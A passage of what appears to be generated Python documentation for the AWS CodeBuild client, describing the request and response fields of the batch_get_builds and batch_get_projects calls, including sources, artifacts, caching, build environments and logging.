If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The name of a service role used for this build.
- **logs** *(dict) --*
Information about the build's logs in Amazon CloudWatch Logs.
- **groupName** *(string) --*
The name of the Amazon CloudWatch Logs group for the build logs.
- **streamName** *(string) --*
The name of the Amazon CloudWatch Logs stream for the build logs.
- **deepLink** *(string) --*
The URL to an individual build log in Amazon CloudWatch Logs.
- **s3DeepLink** *(string) --*
The URL to a build log in an S3 bucket.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about S3 logs for a build project.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, for AWS CodeBuild to wait before timing out this build if it does not get marked as completed.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **buildComplete** *(boolean) --*
Whether the build is complete. True if complete; otherwise, false.
- **initiator** *(string) --*
The entity that started the build. Valid values include:
* If AWS CodePipeline started the build, the pipeline's name (for example, ``codepipeline/my-demo-pipeline`` ).
* If an AWS Identity and Access Management (IAM) user started the build, the user's name (for example, ``MyUserName`` ).
* If the Jenkins plugin for AWS CodeBuild started the build, the string ``CodeBuild-Jenkins-Plugin`` .
- **vpcConfig** *(dict) --*
If your AWS CodeBuild project accesses resources in an Amazon VPC, you provide this parameter that identifies the VPC ID and the list of security group IDs and subnet IDs. The security groups and subnets must belong to the same VPC. You must provide at least one security group and one subnet ID.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
- **networkInterface** *(dict) --*
Describes a network interface.
- **subnetId** *(string) --*
The ID of the subnet.
- **networkInterfaceId** *(string) --*
The ID of the network interface.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
- **buildsNotFound** *(list) --*
The IDs of builds for which information could not be found.
- *(string) --*
:type ids: list
:param ids: **[REQUIRED]**
The IDs of the builds.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def batch_get_projects(self, names: List) -> Dict:
"""
Gets information about build projects.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/BatchGetProjects>`_
**Request Syntax**
::
response = client.batch_get_projects(
names=[
'string',
]
)
**Response Syntax**
::
{
'projects': [
{
'name': 'string',
'arn': 'string',
'description': 'string',
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'artifacts': {
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'encryptionKey': 'string',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'created': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
},
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'badge': {
'badgeEnabled': True|False,
'badgeRequestUrl': 'string'
},
'logsConfig': {
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
},
],
'projectsNotFound': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **projects** *(list) --*
Information about the requested build projects.
- *(dict) --*
Information about a build project.
- **name** *(string) --*
The name of the build project.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build project.
- **description** *(string) --*
A description that makes the build project easy to identify.
- **source** *(dict) --*
Information about the build input source code for this build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **artifacts** *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build project.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build project.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
